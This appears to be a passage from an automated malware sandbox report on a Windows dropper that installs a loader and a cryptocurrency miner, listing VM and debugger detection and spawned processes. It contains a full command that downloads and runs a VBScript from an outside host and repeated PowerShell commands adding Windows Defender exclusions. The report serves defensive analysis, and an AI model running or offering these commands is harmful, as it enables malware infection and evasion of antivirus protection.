                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402218 GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetComputerNameA,GetComputerNameA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,sprintf,printf,7_2_00402218
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeThread delayed: delay time: 60000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599854
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599716
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599534
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599285
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599127
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598988
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598850
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598734
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598625
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598515
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599803
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599687
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599552
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599436
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599327
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599217
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599108
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: svchost64.exe, 00000095.00000002.2843997051.0000000000598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.drBinary or memory string: IsVirtualMachine
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2950307615.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2577066128.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2843755674.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2436766433.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358096287.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2400016250.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.drBinary or memory string: CheckForVirtualMachine
                        Source: file.exe, 00000000.00000002.1763073628.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1789659705.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1789484442.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: miner2.0.exe, 00000055.00000002.2679277773.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: curl.exe, 0000000A.00000003.2354085567.00000212B53C6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000003.2618645292.000001DFDEF56000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2793628082.000000001E4E4000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2853167790.000000001DFCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_7-903
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC01E6 Start: 04CC0289 End: 04CC01B20_2_04CC01E6
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0189 Start: 04CC0289 End: 04CC01B20_2_04CC0189
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0942 rdtsc 0_2_04CC0942
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,7_2_00401B3F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C5645B mov eax, dword ptr fs:[00000030h]6_2_00C5645B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C5A1C2 mov eax, dword ptr fs:[00000030h]6_2_00C5A1C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,GetStartupInfoA,7_2_00401180
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402D90 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,7_2_00402D90
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401E9E puts,ShellExecuteExA,ShellExecuteExA,GetLastError,puts,printf,WaitForSingleObject,CloseHandle,7_2_00401E9E
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
